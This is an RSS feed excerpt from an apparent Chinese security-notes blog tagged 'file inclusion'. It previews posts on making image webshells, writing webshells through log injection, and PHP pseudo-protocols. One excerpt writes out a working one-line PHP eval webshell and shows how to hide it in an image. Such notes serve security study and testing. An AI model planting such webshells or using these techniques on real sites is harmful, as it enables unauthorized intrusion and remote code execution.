http://antjump.com/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/Recent content in 文件包含 on SecNoteHugo -- 0.123.7zh-CNWed, 22 Apr 2026 16:57:02 +0000http://antjump.com/posts/%E5%9B%BE%E7%89%87%E9%A9%AC%E5%88%B6%E4%BD%9C/Wed, 22 Apr 2026 16:57:02 +0000http://antjump.com/posts/%E5%9B%BE%E7%89%87%E9%A9%AC%E5%88%B6%E4%BD%9C/Linux 下制作图片马 方法1：cat 命令直接拼接（最简单，通用） # 准备一个包含PHP代码的文本文件 shell.php echo '<?php @eval($_POST["cmd"]);?>' > shell.php # 准备一张正常图片 image.jpg # 拼接：图片在前，http://antjump.com/posts/webshell%E5%86%99%E5%85%A5%E6%96%B9%E6%B3%95/Wed, 22 Apr 2026 15:04:39 +0000http://antjump.com/posts/webshell%E5%86%99%E5%85%A5%E6%96%B9%E6%B3%95/利用日志注入写入 原理：向日志文件写入PHP代码后，包含该日志文件触发代码执行，代码中再写入Webshell到可访问目录。 Web服务器日志注入http://antjump.com/posts/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/Tue, 21 Apr 2026 15:29:15 +0000http://antjump.com/posts/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/一、文件包含漏洞可用 PHP 伪协议 汇总表 伪协议 语法格式 核心功能（文件包含场景） 依赖 / 条件 file:// file://绝对路径 file://相对路径 读取本地文件